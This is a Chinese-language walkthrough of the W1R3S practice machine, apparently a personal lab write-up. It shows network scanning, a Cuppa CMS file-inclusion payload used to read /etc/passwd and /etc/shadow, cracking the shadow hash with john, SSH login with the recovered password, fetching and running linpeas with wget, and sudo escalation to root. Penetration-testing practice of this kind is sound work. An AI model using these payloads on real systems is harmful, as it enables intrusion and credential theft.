W1R3S

第五个靶机

信息收集

前期依然是找到靶机IP以及开放的端口,这里的手法和之前类似,利用nmap -sn 192.168.4.0/24 或者arp-scan -l 找到目标的靶机IP 192.168.4.135

接着收集端口信息:nmap -p- -sS -sV -A -T5 192.168.4.135 发现开放了21端口、22端口、80端口、3306端口。并且ftp可以未授权登录。直接 ftp 192.168.4.135 用户名为ftp,密码为空,就可以登录进去了。登录进去之后可以发现有三个文件夹,有一个txt 给了用户名信息,另外一个txt 给了一段base64编码及md5,放到https://www.somd5.com/ 上面解密发现是This is not a password ,base64解码也是一段无用信息。。

接着看80端口,先是尝试dirsearch扫描了一下,发现存在wordpress,然后又用dirb扫描,这里我又陷入到了wordpress的漏洞利用里面。。这里的wordpress感觉不能利用,因为不管你输入什么,都会跳转到localhost/xxxx ,这样的话很多漏洞利用不了。

信息收集的能力还是太弱,本来是找到了http://192.168.4.135/administrator/installation/,但是没关注到它的title,而关键点又刚好是在这里。

W1R3S-1

可以发现是Cuppa CMS ,这里也可以利用kali自带的whatweb来识别一些基础信息:

1
2
3
┌──(root㉿kali)-[/home/kali]
└─# whatweb http://192.168.4.135/administrator/installation/
http://192.168.4.135/administrator/installation/ [200 OK] Apache[2.4.18], Cookies[PHPSESSID,country,language], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.4.135], JQuery, Script[text/javascript], Title[Cuppa CMS], X-UA-Compatible[IE=edge]

所以这里要发散一下,去找Cuppa CMS本身的洞,这个靶机很老,这里的洞也是很早的:http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php 可以发现一个文件包含的payload,不过这里的路径需要改一下,并且尝试了get请求是没回显的,但是post可以:

W1R3S-2

这里简单解释一下字段的意思,每个字段是用:隔开,第一个是用户名,第二个x是密码的占位符,以前都是直接放加密的密码,现在是放个占位符,而加密的密码是在/etc/shadow 里面。第三个是描述,第四个是登陆后的解析器,

这里的/usr/sbin/nologin或者/usr/bin/false 就是代表不能登录的意思。

这个题目后面考察的是/etc/shadow文件的爆破。。爆破出w1r3s 用户的密码。我们利用同样的手法来读/etc/shadow文件的内容,然后利用kali的john工具来爆破:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(root㉿kali)-[/home/kali/Desktop]
└─# john w1r3h.txt
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer (w1r3s)
1g 0:00:00:00 DONE 2/3 (2026-03-14 07:21) 1.428g/s 4602p/s 4602c/s 4602C/s 123456..franklin
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

可以发现爆破出W1r3s 的密码对应computer 这里用的是john工具系统默认的密码本,当然和hydra工具一样,我们可以自己去指定密码本。

然后利用ssh来登录ssh w1r3s@192.168.4.135 密码computer 可以发现成功登录,接下来就是提权了。

提权

这里的提权用到了一个脚本linpeas.sh,和之前那个linux内核漏洞遍历脚本一样,都是起到fuzz的作用,遍历一下哪些可以利用的点。我们依然是用到前面的手法,kali上面用python起一个web服务,靶机用wget去下载,然后运行起来。运行界面差不多长这样,其中标橙色的是我们重点需要看的

W1R3S 3

这里发现sudo可以利用。所以直接sudo su root ,然后输入一遍w1r3s用户的密码computer就好了。为什么可以直接sudo提权,是因为我们可以在w1r3s身份下进行sudo -l可以发现以下信息:

1
2
3
4
5
6
w1r3s@W1R3S:/root$ sudo -l
Matching Defaults entries for w1r3s on W1R3S.localdomain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User w1r3s may run the following commands on W1R3S.localdomain:
(ALL : ALL) ALL
w1r3s@W1R3S:/root$

(ALL : ALL) ALL 这里都是ALL,代表任何用户、任何组、可以执行任何命令。